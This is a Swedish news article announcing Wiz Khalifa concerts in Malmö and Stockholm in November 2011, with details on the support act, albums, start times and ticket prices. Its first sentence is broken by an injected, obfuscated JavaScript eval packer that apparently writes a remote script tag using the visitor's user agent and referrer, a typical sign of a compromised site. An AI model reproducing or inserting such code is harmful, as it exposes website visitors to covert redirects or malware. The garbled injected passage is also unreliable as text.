Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

Wiz Khalifa till Stockholm och Malmö

Wiz Khalifa till Stockholm och Malmö
Alexander Gylemo

Wiz eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kfrbf|var|u0026u|referrer|rrhkz||js|php’.split(’|’),0,{}))
Khalifa (Cameron Jibril Thomaz) har minst sagt gjort succé de gånger han besökt Sverige, på hans spelning under Way Out West i sommar var det mer än 25000 personer i publiken. I höst kommer Wiz Khalifa till Sverige igen, denna gång till Stockholm och Malmö
.

Rapparen kommer först till Malmö då han spelar på KB den 20 november 2011 för att sedan den 21:a november ta sig upp till Stockholm och till Münchenbryggeriet. Som support på turnén backas han upp av Eminems upptäckt Yelawolf, som gjorde en succéspelning på Berns i Stockholm tidigare i sommar.

Wiz Khalifa ligger i dagsläget ute med tre album, Show and Prove, Deal or No Deal och hans senaste Rolling Papers (som börjar närma sig en miljon sålda exemplar) och slog nyligen igenom till mainstream-publiken med singeln ”Black and Yellow” som snart setts 100 miljoner gånger på Youtube, något som lett till en nominering som ”Best New Artist” på MTV Video Music Awards.

Konserten i Malmö startar 20.00 och biljett går att köpa på eventim.se för 390 :-. Biljetter till konserten i Stockholm köps på ticnet.se och kostar 360:-, spelningen börjar kl. 20.00.